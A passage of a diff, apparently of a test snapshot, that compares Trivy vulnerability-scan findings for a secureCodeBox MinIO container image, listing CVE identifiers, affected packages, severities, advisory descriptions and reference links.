"scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "tar: does not properly warn the user when extracting setuid or setgid files", + "name": "An issue was discovered in systemd 253. An attacker can modify the con ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2005-2541", - }, - { - "type": "URL", - "value": "http://marc.info/?l=bugtraq&m=112327628230258&w=2", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2005-2541", + "value": "https://avd.aquasec.com/nvd/cve-2023-31439", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", + "value": "https://github.com/kastel-security/Journald", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", + "value": "https://github.com/kastel-security/Journald/blob/main/journald-publication.pdf", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2005-2541", + "value": "https://github.com/systemd/systemd/releases", }, ], "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, + "fixedVersion": "4.16.0-2+deb11u1", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-48303", - "installedVersion": "1.34+dfsg-1", - "packageName": "tar", + "id": "CVE-2021-46848", + "installedVersion": "4.16.0-2", + "packageName": "libtasn1-6", "references": [ - "https://access.redhat.com/errata/RHSA-2023:0959", - "https://access.redhat.com/security/cve/CVE-2022-48303", - "https://bugzilla.redhat.com/2149722", - "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", - "https://errata.almalinux.org/9/ALSA-2023-0959.html", - "https://errata.rockylinux.org/RLSA-2023:0959", - "https://linux.oracle.com/cve/CVE-2022-48303.html", - "https://linux.oracle.com/errata/ELSA-2023-0959.html", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", - "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", - "https://savannah.gnu.org/bugs/?62387", - "https://savannah.gnu.org/patch/?10307", - "https://ubuntu.com/security/notices/USN-5900-1", - "https://ubuntu.com/security/notices/USN-5900-2", - "https://www.cve.org/CVERecord?id=CVE-2022-48303", + "https://access.redhat.com/errata/RHSA-2023:0343", + "https://access.redhat.com/security/cve/CVE-2021-46848", + "https://bugs.gentoo.org/866237", + "https://bugzilla.redhat.com/2140058", + "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", + "https://errata.almalinux.org/9/ALSA-2023-0343.html", + "https://errata.rockylinux.org/RLSA-2023:0343", + "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", + "https://gitlab.com/gnutls/libtasn1/-/issues/32", + "https://linux.oracle.com/cve/CVE-2021-46848.html", + "https://linux.oracle.com/errata/ELSA-2023-0343.html", + "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", + "https://security.netapp.com/advisory/ntap-20221118-0006/", + "https://ubuntu.com/security/notices/USN-5707-1", + "https://www.cve.org/CVERecord?id=CVE-2021-46848", ], }, "category": "Vulnerability", - "description": "GNU Tar through 1.34 has a one-byte out-of-bounds read that results in use of uninitialized memory for a conditional jump. Exploitation to change the flow of control has not been demonstrated. The issue occurs in from_header in list.c via a V7 archive in which mtime has approximately 11 whitespace characters.", + "description": "GNU Libtasn1 before 4.19.0 has an ETYPE_OK off-by-one array size check that affects asn1_encode_simple_der.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "heap buffer overflow at from_header() in list.c via specially crafted checksum", + "name": "libtasn1: Out-of-bound access in ETYPE_OK", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-48303", + "value": "https://avd.aquasec.com/nvd/cve-2021-46848", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:0959", + "value": "https://access.redhat.com/errata/RHSA-2023:0343", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-48303", + "value": "https://access.redhat.com/security/cve/CVE-2021-46848", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2149722", + "value": "https://bugs.gentoo.org/866237", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", + "value": "https://bugzilla.redhat.com/2140058", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2140058", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-0959.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-46848", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0959", + "value": "https://errata.almalinux.org/9/ALSA-2023-0343.html", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-48303.html", + "value": "https://errata.rockylinux.org/RLSA-2023:0343", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-0959.html", + "value": "https://gitlab.com/gnutls/libtasn1/-/commit/44a700d2051a666235748970c2df047ff207aeb5", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", + "value": "https://gitlab.com/gnutls/libtasn1/-/issues/32", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", + "value": "https://linux.oracle.com/cve/CVE-2021-46848.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", + "value": "https://linux.oracle.com/errata/ELSA-2023-0343.html", }, { "type": "URL", - "value": "https://savannah.gnu.org/bugs/?62387", + "value": "https://lists.debian.org/debian-lts-announce/2023/01/msg00003.html", }, { "type": "URL", - "value": "https://savannah.gnu.org/patch/?10307", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AV4SHDJF2XLB4CUPTBPQQ6CLGZ5LKXPZ/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5900-1", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ECM2ELTVRYV4BZ5L5GMIRQE27RFHPAQ6/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5900-2", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OGO7XST4EIJGX4B2ITZCYSWM24534BSU/", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-48303", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/V5LWOGF7QRMNFRUCZY6TDYQJVFI6MOQ2/", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-46848", + }, + { + "type": "URL", + "value": "https://security.netapp.com/advisory/ntap-20221118-0006/", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-5707-1", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-46848", }, ], - "severity": "LOW", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": undefined, + "fixedVersion": "6.2+20201114-2+deb11u1", "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2022-0563", - "installedVersion": "2.36.1-8+deb11u1", - "packageName": "util-linux", + "id": "CVE-2022-29458", + "installedVersion": "6.2+20201114-2", + "packageName": "libtinfo6", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-0563", - "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", - "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", - "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", - "https://security.netapp.com/advisory/ntap-20220331-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "http://seclists.org/fulldisclosure/2022/Oct/41", + "https://access.redhat.com/security/cve/CVE-2022-29458", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", + "https://invisible-island.net/ncurses/NEWS.html#t20220416", + "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", + "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", + "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", + "https://support.apple.com/kb/HT213488", + "https://ubuntu.com/security/notices/USN-5477-1", + "https://ubuntu.com/security/notices/USN-6099-1", + "https://www.cve.org/CVERecord?id=CVE-2022-29458", ], }, "category": "Vulnerability", - "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "description": "ncurses 6.3 before patch 20220416 has an out-of-bounds read and segmentation violation in convert_strings in tinfo/read_entry.c in the terminfo library.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", + "name": "ncurses: segfaulting OOB read", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-0563", + "value": "https://avd.aquasec.com/nvd/cve-2022-29458", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-0563", + "value": "http://seclists.org/fulldisclosure/2022/Oct/41", }, { "type": "URL", - "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "value": "https://access.redhat.com/security/cve/CVE-2022-29458", }, { "type": "URL", - "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29458", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "value": "https://invisible-island.net/ncurses/NEWS.html#t20220416", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", + "value": "https://lists.debian.org/debian-lts-announce/2022/10/msg00037.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", + "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00014.html", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.1.5", - "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2023-27561", - "installedVersion": "v1.0.1", - "packageName": "github.com/opencontainers/runc", - "references": [ - "https://access.redhat.com/security/cve/CVE-2023-27561", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27561", - "https://gist.github.com/LiveOverflow/c937820b688922eb127fb760ce06dab9", - "https://github.com/advisories/GHSA-vpvm-3wq2-2wvm", - "https://github.com/opencontainers/runc/issues/2197#issuecomment-1437617334", - "https://github.com/opencontainers/runc/issues/3751", - "https://github.com/opencontainers/runc/pull/3785", - "https://github.com/opencontainers/runc/releases/tag/v1.1.5", - "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DHGVGGMKGZSJ7YO67TGGPFEHBYMS63VF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FYVE3GB4OG3BNT5DLQHYO4M5SXX33AQ5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I6BF24VCZRFTYBTT3T7HDZUOTKOTNPLZ/", - "https://nvd.nist.gov/vuln/detail/CVE-2023-27561", - "https://ubuntu.com/security/notices/USN-6088-1", - "https://ubuntu.com/security/notices/USN-6088-2", - "https://www.cve.org/CVERecord?id=CVE-2023-27561", - ], - }, - "category": "Vulnerability", - "description": "runc through 1.1.4 has Incorrect Access Control leading to Escalation of Privileges, related to libcontainer/rootfs_linux.go. To exploit this, an attacker must be able to spawn two containers with custom volume-mount configurations, and be able to run custom images. NOTE: this issue exists because of a CVE-2019-19921 regression.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "volume mount race condition (regression of CVE-2019-19921)", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-27561", + "value": "https://lists.gnu.org/archive/html/bug-ncurses/2022-04/msg00016.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-27561", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29458", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27561", + "value": "https://support.apple.com/kb/HT213488", }, { "type": "URL", - "value": "https://gist.github.com/LiveOverflow/c937820b688922eb127fb760ce06dab9", + "value": "https://ubuntu.com/security/notices/USN-5477-1", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vpvm-3wq2-2wvm", + "value": "https://ubuntu.com/security/notices/USN-6099-1", }, { "type": "URL", - "value": "https://github.com/opencontainers/runc/issues/2197#issuecomment-1437617334", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-29458", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29491", + "installedVersion": "6.2+20201114-2", + "packageName": "libtinfo6", + "references": [ + "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", + "http://www.openwall.com/lists/oss-security/2023/04/19/10", + "http://www.openwall.com/lists/oss-security/2023/04/19/11", + "https://access.redhat.com/security/cve/CVE-2023-29491", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", + "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", + "https://security.netapp.com/advisory/ntap-20230517-0009/", + "https://ubuntu.com/security/notices/USN-6099-1", + "https://www.cve.org/CVERecord?id=CVE-2023-29491", + "https://www.openwall.com/lists/oss-security/2023/04/12/5", + "https://www.openwall.com/lists/oss-security/2023/04/13/4", + ], + }, + "category": "Vulnerability", + "description": "ncurses before 6.4 20230408, when used by a setuid application, allows local users to trigger security-relevant memory corruption via malformed data in a terminfo database file that is found in $HOME/.terminfo or reached via the TERMINFO or TERM environment variable.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "Local users can trigger security-relevant memory corruption via malformed data", + "references": [ { "type": "URL", - "value": "https://github.com/opencontainers/runc/issues/3751", + "value": "https://avd.aquasec.com/nvd/cve-2023-29491", }, { "type": "URL", - "value": "https://github.com/opencontainers/runc/pull/3785", + "value": "http://ncurses.scripts.mit.edu/?p=ncurses.git;a=commit;h=eb51b1ea1f75a0ec17c9c5937cb28df1e8eeec56", }, { "type": "URL", - "value": "https://github.com/opencontainers/runc/releases/tag/v1.1.5", + "value": "http://www.openwall.com/lists/oss-security/2023/04/19/10", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html", + "value": "http://www.openwall.com/lists/oss-security/2023/04/19/11", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DHGVGGMKGZSJ7YO67TGGPFEHBYMS63VF/", + "value": "https://access.redhat.com/security/cve/CVE-2023-29491", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FYVE3GB4OG3BNT5DLQHYO4M5SXX33AQ5/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29491", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I6BF24VCZRFTYBTT3T7HDZUOTKOTNPLZ/", + "value": "https://invisible-island.net/ncurses/NEWS.html#index-t20230408", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-27561", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29491", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6088-1", + "value": "https://security.netapp.com/advisory/ntap-20230517-0009/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6088-2", + "value": "https://ubuntu.com/security/notices/USN-6099-1", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-27561", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29491", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2023/04/12/5", + }, + { + "type": "URL", + "value": "https://www.openwall.com/lists/oss-security/2023/04/13/4", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.0", - "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-43784", - "installedVersion": "v1.0.1", - "packageName": "github.com/opencontainers/runc", + "fixedVersion": "247.3-7+deb11u2", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-3821", + "installedVersion": "247.3-7", + "packageName": "libudev1", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-43784", - "https://bugs.chromium.org/p/project-zero/issues/detail?id=2241", - "https://github.com/advisories/GHSA-v95c-p5hm-xq8f", - "https://github.com/opencontainers/runc/commit/9c444070ec7bb83995dbc0185da68284da71c554", - "https://github.com/opencontainers/runc/commit/d72d057ba794164c3cce9451a00b72a78b25e1ae", - "https://github.com/opencontainers/runc/commit/dde509df4e28cec33b3c99c6cda3d4fd5beafc77", - "https://github.com/opencontainers/runc/commit/f50369af4b571e358f20b139eea52d612eb55eed", - "https://github.com/opencontainers/runc/security/advisories/GHSA-v95c-p5hm-xq8f", - "https://lists.debian.org/debian-lts-announce/2021/12/msg00005.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-43784", - "https://pkg.go.dev/vuln/GO-2022-0274", - "https://www.cve.org/CVERecord?id=CVE-2021-43784", + "https://access.redhat.com/errata/RHSA-2023:0336", + "https://access.redhat.com/security/cve/CVE-2022-3821", + "https://bugzilla.redhat.com/2139327", + "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", + "https://errata.almalinux.org/9/ALSA-2023-0336.html", + "https://errata.rockylinux.org/RLSA-2023:0336", + "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", + "https://github.com/systemd/systemd/issues/23928", + "https://github.com/systemd/systemd/pull/23933", + "https://linux.oracle.com/cve/CVE-2022-3821.html", + "https://linux.oracle.com/errata/ELSA-2023-0336.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", + "https://security.gentoo.org/glsa/202305-15", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-3821", ], }, "category": "Vulnerability", - "description": "runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. In runc, netlink is used internally as a serialization system for specifying the relevant container configuration to the \`C\` portion of the code (responsible for the based namespace setup of containers). In all versions of runc prior to 1.0.3, the encoder did not handle the possibility of an integer overflow in the 16-bit length field for the byte array attribute type, meaning that a large enough malicious byte array attribute could result in the length overflowing and the attribute contents being parsed as netlink messages for container configuration. This vulnerability requires the attacker to have some control over the configuration of the container and would allow the attacker to bypass the namespace restrictions of the container by simply adding their own netlink payload which disables all namespaces. The main users impacted are those who allow untrusted images with untrusted configurations to run on their machines (such as with shared cloud infrastructure). runc version 1.0.3 contains a fix for this bug. As a workaround, one may try disallowing untrusted namespace paths from your container. It should be noted that untrusted namespace paths would allow the attacker to disable namespace protections entirely even in the absence of this bug.", + "description": "An off-by-one Error issue was discovered in Systemd in format_timespan() function of time-util.c. An attacker could supply specific values for time and accuracy that leads to buffer overrun in format_timespan(), leading to a Denial of Service.", "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "runc: integer overflow in netlink bytemsg length field allows attacker to override netlink-based container configuration", + "name": "buffer overrun in format_timespan() function", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-43784", + "value": "https://avd.aquasec.com/nvd/cve-2022-3821", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-43784", + "value": "https://access.redhat.com/errata/RHSA-2023:0336", }, { "type": "URL", - "value": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2241", + "value": "https://access.redhat.com/security/cve/CVE-2022-3821", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-v95c-p5hm-xq8f", + "value": "https://bugzilla.redhat.com/2139327", }, { "type": "URL", - "value": "https://github.com/opencontainers/runc/commit/9c444070ec7bb83995dbc0185da68284da71c554", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2139327", }, { "type": "URL", - "value": "https://github.com/opencontainers/runc/commit/d72d057ba794164c3cce9451a00b72a78b25e1ae", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3821", }, { "type": "URL", - "value": "https://github.com/opencontainers/runc/commit/dde509df4e28cec33b3c99c6cda3d4fd5beafc77", + "value": "https://errata.almalinux.org/9/ALSA-2023-0336.html", }, { "type": "URL", - "value": "https://github.com/opencontainers/runc/commit/f50369af4b571e358f20b139eea52d612eb55eed", + "value": "https://errata.rockylinux.org/RLSA-2023:0336", }, { "type": "URL", - "value": "https://github.com/opencontainers/runc/security/advisories/GHSA-v95c-p5hm-xq8f", + "value": "https://github.com/systemd/systemd/commit/9102c625a673a3246d7e73d8737f3494446bad4e", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/12/msg00005.html", + "value": "https://github.com/systemd/systemd/issues/23928", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-43784", + "value": "https://github.com/systemd/systemd/pull/23933", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0274", + "value": "https://linux.oracle.com/cve/CVE-2022-3821.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-43784", + "value": "https://linux.oracle.com/errata/ELSA-2023-0336.html", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": "1.1.2", - "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-29162", - "installedVersion": "v1.0.1", - "packageName": "github.com/opencontainers/runc", - "references": [ - "https://access.redhat.com/errata/RHSA-2022:8090", - "https://access.redhat.com/security/cve/CVE-2022-29162", - "https://bugzilla.redhat.com/2086398", - "https://bugzilla.redhat.com/show_bug.cgi?id=2086398", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29162", - "https://errata.almalinux.org/9/ALSA-2022-8090.html", - "https://errata.rockylinux.org/RLSA-2022:8090", - "https://github.com/advisories/GHSA-f3fp-gc8g-vw66", - "https://github.com/opencontainers/runc/commit/98fe566c527479195ce3c8167136d2a555fe6b65", - "https://github.com/opencontainers/runc/commit/d04de3a9b72d7a2455c1885fc75eb36d02cd17b5", - "https://github.com/opencontainers/runc/releases/tag/v1.1.2", - "https://github.com/opencontainers/runc/security/advisories/GHSA-f3fp-gc8g-vw66", - "https://linux.oracle.com/cve/CVE-2022-29162.html", - "https://linux.oracle.com/errata/ELSA-2022-8090.html", - "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AVPZBV7ISA7QKRPTC7ZXWKMIQI2HZEBB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D77CKD3AXPMU4PMQIQI5Q74SI4JATNND/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GPQU4YC4AAY54JDXGDQHJEYKSXXG5T2Y/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29162", - "https://ubuntu.com/security/notices/USN-6088-2", - "https://www.cve.org/CVERecord?id=CVE-2022-29162", - "https://www.openwall.com/lists/oss-security/2022/05/12/1", - ], - }, - "category": "Vulnerability", - "description": "runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. A bug was found in runc prior to version 1.1.2 where \`runc exec --cap\` created processes with non-empty inheritable Linux process capabilities, creating an atypical Linux environment and enabling programs with inheritable file capabilities to elevate those capabilities to the permitted set during execve(2). This bug did not affect the container security sandbox as the inheritable set never contained more capabilities than were included in the container's bounding set. This bug has been fixed in runc 1.1.2. This fix changes \`runc exec --cap\` behavior such that the additional capabilities granted to the process being executed (as specified via \`--cap\` arguments) do not include inheritable capabilities. In addition, \`runc spec\` is changed to not set any inheritable capabilities in the created example OCI spec (\`config.json\`) file.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "runc: incorrect handling of inheritable capabilities", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29162", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RVBQC2VLSDVQAPJTEMTREXDL4HYLXG2P/", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8090", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-3821", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29162", + "value": "https://security.gentoo.org/glsa/202305-15", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2086398", + "value": "https://ubuntu.com/security/notices/USN-5928-1", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2086398", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-3821", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "247.3-7+deb11u2", + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-4415", + "installedVersion": "247.3-7", + "packageName": "libudev1", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:0954", + "https://access.redhat.com/security/cve/CVE-2022-4415", + "https://bugzilla.redhat.com/2149063", + "https://bugzilla.redhat.com/2155515", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149063", + "https://bugzilla.redhat.com/show_bug.cgi?id=2155515", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4415", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45873", + "https://errata.almalinux.org/9/ALSA-2023-0954.html", + "https://errata.rockylinux.org/RLSA-2023:0954", + "https://github.com/systemd/systemd/commit/b7641425659243c09473cd8fb3aef2c0d4a3eb9c", + "https://linux.oracle.com/cve/CVE-2022-4415.html", + "https://linux.oracle.com/errata/ELSA-2023-0954.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-4415", + "https://ubuntu.com/security/notices/USN-5928-1", + "https://www.cve.org/CVERecord?id=CVE-2022-4415", + "https://www.openwall.com/lists/oss-security/2022/12/21/3", + ], + }, + "category": "Vulnerability", + "description": "A vulnerability was found in systemd. This security flaw can cause a local information leak due to systemd-coredump not respecting the fs.suid_dumpable kernel setting.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "systemd: local information leak due to systemd-coredump not respecting fs.suid_dumpable kernel setting", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29162", + "value": "https://avd.aquasec.com/nvd/cve-2022-4415", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8090.html", + "value": "https://access.redhat.com/errata/RHSA-2023:0954", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8090", + "value": "https://access.redhat.com/security/cve/CVE-2022-4415", }, { "type": 